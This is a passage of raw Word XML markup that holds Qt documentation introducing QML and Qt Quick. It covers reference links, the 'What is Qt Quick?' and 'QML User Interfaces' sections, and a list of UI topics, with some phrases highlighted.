          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - begin using QML with these examples</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2953" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Creating Qt Quick Projects in Qt Creator</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2954" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>The QML Reference</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> - reference about the QML constructs and features</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2955" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>QML Coding Conventions</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="91"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2956" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Glossary of QML Terms</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2659" w:name="what-is-qt-quick"/>
      <w:bookmarkStart w:id="2660" w:name="_Toc483001112"/>
      <w:bookmarkStart w:id="2661" w:name="_Toc483004081"/>
      <w:bookmarkStart w:id="2662" w:name="_Toc483604445"/>
      <w:bookmarkStart w:id="2663" w:name="_Toc483605665"/>
      <w:bookmarkEnd w:id="2659"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>What is Qt Quick?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2660"/>
      <w:bookmarkEnd w:id="2661"/>
      <w:bookmarkEnd w:id="2662"/>
      <w:bookmarkEnd w:id="2663"/>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 xml:space="preserve">Qt Quick is the </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>standard library of types and functionality for QML</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. It includes </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>visual types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interactive types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animations</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>models</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>views</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>particle effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shader effects</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. A QML application developer </w:t>
      </w:r>
      <w:r w:rsidRPr="00C83331">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>can get access to all of that functionality with a single import statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>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lastRenderedPageBreak/>
        <w:t>The QtQuick QML library is provided by the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2957" w:history="1">
        <w:r w:rsidRPr="00605096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> module</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>. For in-depth information about the various QML types and other functionality provided by Qt Quick, please see the </w:t>
      </w:r>
      <w:hyperlink r:id="rId2958" w:history="1">
        <w:r w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> module documentation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="0008522D" w:rsidRDefault="00C10CB8" w:rsidP="0008522D">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="2664" w:name="qml-user-interfaces"/>
      <w:bookmarkStart w:id="2665" w:name="_Toc483001113"/>
      <w:bookmarkStart w:id="2666" w:name="_Toc483004082"/>
      <w:bookmarkStart w:id="2667" w:name="_Toc483604446"/>
      <w:bookmarkStart w:id="2668" w:name="_Toc483605666"/>
      <w:bookmarkEnd w:id="2664"/>
      <w:r w:rsidRPr="0008522D">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QML User Interfaces</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2665"/>
      <w:bookmarkEnd w:id="2666"/>
      <w:bookmarkEnd w:id="2667"/>
      <w:bookmarkEnd w:id="2668"/>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F</w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>or creating or customizing graphical user interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Qt Quick adds visual types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>animation types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>other QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>addition to the standard QML types</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> from Qt QML. </w:t>
      </w:r>
      <w:hyperlink r:id="rId2959" w:history="1">
        <w:r w:rsidRPr="00605096">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Qt Quick Designer</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> is integrated within Qt Creator</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and su</w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pports</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick 2</w:t>
      </w:r>
      <w:r w:rsidR="0008522D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00605096">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>from Qt Creator version 2.7 and onwards</w:t>
      </w:r>
      <w:r w:rsidRPr="00C10CB8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2960" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Visual types in QML</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2961" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Responding to User Input in QML</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2962" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Animations in QML</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2963" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Displaying Text in QML</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2964" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Layouts in QML</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2965" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>Style and Theme Support</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C10CB8" w:rsidRPr="00C10CB8" w:rsidRDefault="00490E7E" w:rsidP="00C10CB8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="92"/>
        </w:numPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="404040"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId2966" w:history="1">
        <w:r w:rsidR="00C10CB8" w:rsidRPr="00C10CB8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:i/>
